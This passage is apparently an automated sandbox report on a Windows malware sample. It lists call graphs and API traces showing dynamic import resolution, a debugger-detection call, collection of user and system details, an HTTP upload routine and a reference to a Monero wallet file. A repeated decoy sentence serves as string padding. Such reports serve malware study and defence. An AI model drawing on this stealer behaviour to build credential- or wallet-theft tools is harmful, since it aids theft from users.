14332 1c40e0 14331->14332 14333 1c45c0 2 API calls 14332->14333 14334 1c40f9 14333->14334 14335 1c45c0 2 API calls 14334->14335 14336 1c4112 14335->14336 14337 1c45c0 2 API calls 14336->14337 14338 1c412b 14337->14338 14339 1c45c0 2 API calls 14338->14339 14340 1c4144 14339->14340 14341 1c45c0 2 API calls 14340->14341 14342 1c415d 14341->14342 14343 1c45c0 2 API calls 14342->14343 14344 1c4176 14343->14344 14345 1c45c0 2 API calls 14344->14345 14346 1c418f 14345->14346 14347 1c45c0 2 API calls 14346->14347 14348 1c41a8 14347->14348 14349 1c45c0 2 API calls 14348->14349 14350 1c41c1 14349->14350 14351 1c45c0 2 API calls 14350->14351 14352 1c41da 14351->14352 14353 1c45c0 2 API calls 14352->14353 14354 1c41f3 
14353->14354 14355 1c45c0 2 API calls 14354->14355 14356 1c420c 14355->14356 14357 1c45c0 2 API calls 14356->14357 14358 1c4225 14357->14358 14359 1c45c0 2 API calls 14358->14359 14360 1c423e 14359->14360 14361 1c45c0 2 API calls 14360->14361 14362 1c4257 14361->14362 14363 1c45c0 2 API calls 14362->14363 14364 1c4270 14363->14364 14365 1c45c0 2 API calls 14364->14365 14366 1c4289 14365->14366 14367 1c45c0 2 API calls 14366->14367 14368 1c42a2 14367->14368 14369 1c45c0 2 API calls 14368->14369 14370 1c42bb 14369->14370 14371 1c45c0 2 API calls 14370->14371 14372 1c42d4 14371->14372 14373 1c45c0 2 API calls 14372->14373 14374 1c42ed 14373->14374 14375 1c45c0 2 API calls 14374->14375 14376 1c4306 14375->14376 14377 1c45c0 2 API calls 14376->14377 14378 1c431f 14377->14378 14379 1c45c0 2 API calls 14378->14379 14380 1c4338 14379->14380 14381 1c45c0 2 API calls 14380->14381 14382 1c4351 14381->14382 14383 1c45c0 2 API calls 14382->14383 14384 1c436a 14383->14384 14385 1c45c0 2 API calls 14384->14385 14386 1c4383 14385->14386 14387 1c45c0 2 API calls 14386->14387 14388 1c439c 14387->14388 14389 1c45c0 2 API calls 14388->14389 14390 1c43b5 14389->14390 14391 1c45c0 2 API calls 14390->14391 14392 1c43ce 14391->14392 14393 1c45c0 2 API calls 14392->14393 14394 1c43e7 14393->14394 14395 1c45c0 2 API calls 14394->14395 14396 1c4400 14395->14396 14397 1c45c0 2 API calls 14396->14397 14398 1c4419 14397->14398 14399 1c45c0 2 API calls 14398->14399 14400 1c4432 14399->14400 14401 1c45c0 2 API calls 14400->14401 14402 1c444b 14401->14402 14403 1c45c0 2 API calls 14402->14403 14404 1c4464 14403->14404 14405 1c45c0 2 API calls 14404->14405 14406 1c447d 14405->14406 14407 1c45c0 2 API calls 14406->14407 14408 1c4496 14407->14408 14409 1c45c0 2 API calls 14408->14409 14410 1c44af 14409->14410 14411 1c45c0 2 API calls 14410->14411 14412 1c44c8 14411->14412 14413 1c45c0 2 API calls 14412->14413 14414 1c44e1 14413->14414 14415 1c45c0 2 API calls 14414->14415 14416 1c44fa 14415->14416 
14417 1c45c0 2 API calls 14416->14417 14418 1c4513 14417->14418 14419 1c45c0 2 API calls 14418->14419 14420 1c452c 14419->14420 14421 1c45c0 2 API calls 14420->14421 14422 1c4545 14421->14422 14423 1c45c0 2 API calls 14422->14423 14424 1c455e 14423->14424 14425 1c45c0 2 API calls 14424->14425 14426 1c4577 14425->14426 14427 1c45c0 2 API calls 14426->14427 14428 1c4590 14427->14428 14429 1c45c0 2 API calls 14428->14429 14430 1c45a9 14429->14430 14431 1d9c10 14430->14431 14432 1da036 8 API calls 14431->14432 14433 1d9c20 43 API calls 14431->14433 14434 1da0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14432->14434 14435 1da146 14432->14435 14433->14432 14434->14435 14436 1da216 14435->14436 14437 1da153 8 API calls 14435->14437 14438 1da21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14436->14438 14439 1da298 14436->14439 14437->14436 14438->14439 14440 1da2a5 6 API calls 14439->14440 14441 1da337 14439->14441 14440->14441 14442 1da41f 14441->14442 14443 1da344 9 API calls 14441->14443 14444 1da428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14442->14444 14445 1da4a2 14442->14445 14443->14442 14444->14445 14446 1da4dc 14445->14446 14447 1da4ab GetProcAddress GetProcAddress 14445->14447 14448 1da515 14446->14448 14449 1da4e5 GetProcAddress GetProcAddress 14446->14449 14447->14446 14450 1da612 14448->14450 14451 1da522 10 API calls 14448->14451 14449->14448 14452 1da67d 14450->14452 14453 1da61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14450->14453 14451->14450 14454 1da69e 14452->14454 14455 1da686 GetProcAddress 14452->14455 14453->14452 14456 1d5ca3 14454->14456 14457 1da6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14454->14457 14455->14454 14458 1c1590 14456->14458 14457->14456 15579 1c1670 14458->15579 14461 1da7a0 lstrcpy 14462 1c15b5 14461->14462 14463 1da7a0 lstrcpy 14462->14463 14464 1c15c7 14463->14464 14465 1da7a0 lstrcpy 
14464->14465 14466 1c15d9 14465->14466 14467 1da7a0 lstrcpy 14466->14467 14468 1c1663 14467->14468 14469 1d5510 14468->14469 14470 1d5521 14469->14470 14471 1da820 2 API calls 14470->14471 14472 1d552e 14471->14472 14473 1da820 2 API calls 14472->14473 14474 1d553b 14473->14474 14475 1da820 2 API calls 14474->14475 14476 1d5548 14475->14476 14477 1da740 lstrcpy 14476->14477 14478 1d5555 14477->14478 14479 1da740 lstrcpy 14478->14479 14480 1d5562 14479->14480 14481 1da740 lstrcpy 14480->14481 14482 1d556f 14481->14482 14483 1da740 lstrcpy 14482->14483 14495 1d557c 14483->14495 14484 1da740 lstrcpy 14484->14495 14485 1da7a0 lstrcpy 14485->14495 14486 1d5643 StrCmpCA 14486->14495 14487 1d56a0 StrCmpCA 14488 1d57dc 14487->14488 14487->14495 14489 1da8a0 lstrcpy 14488->14489 14490 1d57e8 14489->14490 14492 1da820 2 API calls 14490->14492 14491 1da820 lstrlen lstrcpy 14491->14495 14493 1d57f6 14492->14493 14496 1da820 2 API calls 14493->14496 14494 1d5856 StrCmpCA 14494->14495 14497 1d5991 14494->14497 14495->14484 14495->14485 14495->14486 14495->14487 14495->14491 14495->14494 14501 1c1590 lstrcpy 14495->14501 14505 1d5a0b StrCmpCA 14495->14505 14506 1d52c0 25 API calls 14495->14506 14512 1da8a0 lstrcpy 14495->14512 14518 1d578a StrCmpCA 14495->14518 14522 1d593f StrCmpCA 14495->14522 14523 1d51f0 20 API calls 14495->14523 14498 1d5805 14496->14498 14499 1da8a0 lstrcpy 14497->14499 14500 1c1670 lstrcpy 14498->14500 14502 1d599d 14499->14502 14521 1d5811 14500->14521 14501->14495 14503 1da820 2 API calls 14502->14503 14504 1d59ab 14503->14504 14507 1da820 2 API calls 14504->14507 14508 1d5a28 14505->14508 14509 1d5a16 Sleep 14505->14509 14506->14495 14510 1d59ba 14507->14510 14511 1da8a0 lstrcpy 14508->14511 14509->14495 14513 1c1670 lstrcpy 14510->14513 14514 1d5a34 14511->14514 14512->14495 14513->14521 14515 1da820 2 API calls 14514->14515 14516 1d5a43 14515->14516 14517 1da820 2 API calls 14516->14517 14519 1d5a52 14517->14519 14518->14495 14520 1c1670 lstrcpy 
14519->14520 14520->14521 14521->13576 14522->14495 14523->14495 14525 1d754c 14524->14525 14526 1d7553 GetVolumeInformationA 14524->14526 14525->14526 14527 1d7591 14526->14527 14528 1d75fc GetProcessHeap RtlAllocateHeap 14527->14528 14529 1d7619 14528->14529 14530 1d7628 wsprintfA 14528->14530 14531 1da740 lstrcpy 14529->14531 14532 1da740 lstrcpy 14530->14532 14533 1d5da7 14531->14533 14532->14533 14533->13597 14535 1da7a0 lstrcpy 14534->14535 14536 1c4899 14535->14536 15588 1c47b0 14536->15588 14538 1c48a5 14539 1da740 lstrcpy 14538->14539 14540 1c48d7 14539->14540 14541 1da740 lstrcpy 14540->14541 14542 1c48e4 14541->14542 14543 1da740 lstrcpy 14542->14543 14544 1c48f1 14543->14544 14545 1da740 lstrcpy 14544->14545 14546 1c48fe 14545->14546 14547 1da740 lstrcpy 14546->14547 14548 1c490b InternetOpenA StrCmpCA 14547->14548 14549 1c4944 14548->14549 14550 1c4ecb InternetCloseHandle 14549->14550 15594 1d8b60 14549->15594 14552 1c4ee8 14550->14552 15609 1c9ac0 CryptStringToBinaryA 14552->15609 14553 1c4963 15602 1da920 14553->15602 14556 1c4976 14558 1da8a0 lstrcpy 14556->14558 14564 1c497f 14558->14564 14559 1da820 2 API calls 14560 1c4f05 14559->14560 14562 1da9b0 4 API calls 14560->14562 14561 1c4f27 codecvt 14566 1da7a0 lstrcpy 14561->14566 14563 1c4f1b 14562->14563 14565 1da8a0 lstrcpy 14563->14565 14567 1da9b0 4 API calls 14564->14567 14565->14561 14578 1c4f57 14566->14578 14568 1c49a9 14567->14568 14569 1da8a0 lstrcpy 14568->14569 14570 1c49b2 14569->14570 14571 1da9b0 4 API calls 14570->14571 14572 1c49d1 14571->14572 14573 1da8a0 lstrcpy 14572->14573 14574 1c49da 14573->14574 14575 1da920 3 API calls 14574->14575 14576 1c49f8 14575->14576 14577 1da8a0 lstrcpy 14576->14577 14579 1c4a01 14577->14579 14578->13600 14580 1da9b0 4 API calls 14579->14580 14581 1c4a20 14580->14581 14582 1da8a0 lstrcpy 14581->14582 14583 1c4a29 14582->14583 14584 1da9b0 4 API calls 14583->14584 14585 1c4a48 14584->14585 14586 1da8a0 lstrcpy 14585->14586 14587 1c4a51 14586->14587 

                              Control-flow Graph (function starting at 1d9860; rendered graph not reproduced)
                              Legend: Executed / Not Executed
                              APIs
                              • GetProcAddress.KERNEL32(74DD0000,014A23B0), ref: 001D98A1
                              • GetProcAddress.KERNEL32(74DD0000,014A2308), ref: 001D98BA
                              • GetProcAddress.KERNEL32(74DD0000,014A2440), ref: 001D98D2
                              • GetProcAddress.KERNEL32(74DD0000,014A2458), ref: 001D98EA
                              • GetProcAddress.KERNEL32(74DD0000,014A22A8), ref: 001D9903
                              • GetProcAddress.KERNEL32(74DD0000,014A90C8), ref: 001D991B
                              • GetProcAddress.KERNEL32(74DD0000,01495910), ref: 001D9933
                              • GetProcAddress.KERNEL32(74DD0000,01495750), ref: 001D994C
                              • GetProcAddress.KERNEL32(74DD0000,014A2470), ref: 001D9964
                              • GetProcAddress.KERNEL32(74DD0000,014A24D0), ref: 001D997C
                              • GetProcAddress.KERNEL32(74DD0000,014A2488), ref: 001D9995
                              • GetProcAddress.KERNEL32(74DD0000,014A2248), ref: 001D99AD
                              • GetProcAddress.KERNEL32(74DD0000,014958D0), ref: 001D99C5
                              • GetProcAddress.KERNEL32(74DD0000,014A2278), ref: 001D99DE
                              • GetProcAddress.KERNEL32(74DD0000,014A22C0), ref: 001D99F6
                              • GetProcAddress.KERNEL32(74DD0000,01495770), ref: 001D9A0E
                              • GetProcAddress.KERNEL32(74DD0000,014A22D8), ref: 001D9A27
                              • GetProcAddress.KERNEL32(74DD0000,014A22F0), ref: 001D9A3F
                              • GetProcAddress.KERNEL32(74DD0000,014959F0), ref: 001D9A57
                              • GetProcAddress.KERNEL32(74DD0000,014A2320), ref: 001D9A70
                              • GetProcAddress.KERNEL32(74DD0000,01495790), ref: 001D9A88
                              • LoadLibraryA.KERNEL32(014A2578,?,001D6A00), ref: 001D9A9A
                              • LoadLibraryA.KERNEL32(014A2518,?,001D6A00), ref: 001D9AAB
                              • LoadLibraryA.KERNEL32(014A25A8,?,001D6A00), ref: 001D9ABD
                              • LoadLibraryA.KERNEL32(014A2560,?,001D6A00), ref: 001D9ACF
                              • LoadLibraryA.KERNEL32(014A2530,?,001D6A00), ref: 001D9AE0
                              • GetProcAddress.KERNEL32(75A70000,014A2548), ref: 001D9B02
                              • GetProcAddress.KERNEL32(75290000,014A2590), ref: 001D9B23
                              • GetProcAddress.KERNEL32(75290000,014A25C0), ref: 001D9B3B
                              • GetProcAddress.KERNEL32(75BD0000,014A25D8), ref: 001D9B5D
                              • GetProcAddress.KERNEL32(75450000,014957B0), ref: 001D9B7E
                              • GetProcAddress.KERNEL32(76E90000,014A8F08), ref: 001D9B9F
                              • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 001D9BB6
                              Strings
                              • NtQueryInformationProcess, xrefs: 001D9BAA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: 409d7b41d31482bb73a921a3eac332a1044700b57909e0d1321c65122524f687
                              • Instruction ID: fccb3a82c38195e7210a6b9f0efa5573c060493838ed285e558975015b4c5420
                              • Opcode Fuzzy Hash: 409d7b41d31482bb73a921a3eac332a1044700b57909e0d1321c65122524f687
                              • Instruction Fuzzy Hash: ECA16CB6510340AFD344EFA8FF88A6677F9F78C301704C53AA605E3264D7399865CB5A

                              Control-flow Graph (rendered graph image not reproduced; legend: Executed / Not Executed)

                              • Nodes: 764 = 1c45c0-1c4695 (RtlAllocateHeap); 781 = 1c46a0-1c46a6; 782 = 1c46ac-1c474a; 783 = 1c474f-1c47a9 (VirtualProtect)
                              • Edges: 764->781, 781->782, 781->783, 782->781
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001C460F
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 001C479C
                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C477B
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C46B7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C466D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C46CD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4765
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4622
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4638
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C45D2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4617
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C473F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C471E
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C475A
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C45E8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4662
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C46C2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4770
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4678
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C45DD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4657
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4729
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C46AC
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C45C7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C45F3
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C474F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4683
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4713
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C46D8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C462D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4643
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4734
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: b9ad137eba9aec70e354105b709bcfe68a4fe73a252d4eb6059adf28a0c899b7
                              • Instruction ID: bfc8a327f107ad683411b751bb77dce2fdac23dec6cb4f62be7633eb503823aa
                              • Opcode Fuzzy Hash: b9ad137eba9aec70e354105b709bcfe68a4fe73a252d4eb6059adf28a0c899b7
                              • Instruction Fuzzy Hash: E54136687F7E84AAC768B7E5884EEBD7757DF42B0EF505044A840522CECBF0672C452A

                              Control-flow Graph (rendered graph image not reproduced; legend: Executed / Not Executed)

                              • Entry block 801 = 1c4880-1c4942 (calls 1da7a0, 1c47b0, 1da740 * 5, InternetOpenA, StrCmpCA); 801->816, 801->817; 817 = 1c4944, 817->816; 816 = 1c494b-1c494f, 816->818, 816->819
                              • Block 819 = 1c4955-1c4acd (string helper calls 1d8b60, 1da920, 1da8a0, 1da800, 1da9b0, then InternetConnectA); 819->818, 819->905; 905 = 1c4ad3-1c4ad7, 905->906 (1c4ad9-1c4ae3), 905->907 (1c4ae5); 906->908, 907->908
                              • Block 908 = 1c4aef-1c4b22 (HttpOpenRequestA); 908->909, 908->910
                              • Block 910 = 1c4b28-1c4e28 (repeated string helper calls 1da9b0, 1da8a0, 1da800, 1da920, 1da740, 1daad0, lstrlen * 2, then HttpSendRequestA); 910->1021
                              • Block 1021 = 1c4e32-1c4e5c (InternetReadFile); 1021->1022 (1c4e5e-1c4e65), 1021->1023; 1022->1023, 1022->1024; 1024 = 1c4e69-1c4ea7 (calls 1da9b0, 1da8a0, 1da800), 1024->1021 (read loop); 1023 = 1c4e67-1c4eb9 (InternetCloseHandle, call 1da800), 1023->909
                              • Block 909 = 1c4ebe-1c4ec5 (InternetCloseHandle), 909->818; 818 = 1c4ecb-1c4ef3 (InternetCloseHandle, calls 1daad0, 1c9ac0), 818->829, 818->830; 829 = 1c4ef5-1c4f2d (calls 1da820, 1da9b0, 1da8a0, 1da800), 829->830; 830 = 1c4f32-1c4fa2 (calls 1d8990 * 2, 1da7a0, 1da800 * 8)
                              APIs
                                • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                                • Part of subcall function 001C47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 001C4839
                                • Part of subcall function 001C47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 001C4849
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 001C4915
                              • StrCmpCA.SHLWAPI(?,014AE9B8), ref: 001C493A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 001C4ABA
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,001E0DDB,00000000,?,?,00000000,?,",00000000,?,014AEAF8), ref: 001C4DE8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 001C4E04
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 001C4E18
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 001C4E49
                              • InternetCloseHandle.WININET(00000000), ref: 001C4EAD
                              • InternetCloseHandle.WININET(00000000), ref: 001C4EC5
                              • HttpOpenRequestA.WININET(00000000,014AE9C8,?,014AE110,00000000,00000000,00400100,00000000), ref: 001C4B15
                                • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                                • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                                • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                                • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                                • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                              • InternetCloseHandle.WININET(00000000), ref: 001C4ECF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 460715078-2180234286
                              • Opcode ID: d154d938e119b39d2800797960ae6fc1c2e8f82ed8e262f6281bd9644472c3cc
                              • Instruction ID: e356788a342f2a02b2b39553800bcb82e6da6e0433d1307a7266470fe4d75db2
                              • Opcode Fuzzy Hash: d154d938e119b39d2800797960ae6fc1c2e8f82ed8e262f6281bd9644472c3cc
                              • Instruction Fuzzy Hash: 74121171910158AADB15EB90DDA2FEEB338BF24301F90419AB50673191EF706F49CF66
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001C11B7), ref: 001D7880
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001D7887
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 001D789F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: ff2e85a06ae1d3bd0daeb20d90245a02f0216168d37cb2a64563e19a94419507
                              • Instruction ID: 68b5c14631a8a3b8f0d653a7b51b2a28cde63d99b743189dad970cc9c3fbd47f
                              • Opcode Fuzzy Hash: ff2e85a06ae1d3bd0daeb20d90245a02f0216168d37cb2a64563e19a94419507
                              • Instruction Fuzzy Hash: AFF04FB2944208ABC714DF98DD49BAEBBB8EB05711F10426AFA05A3780C77455048BA1
                              APIs
                              Memory Dump Source
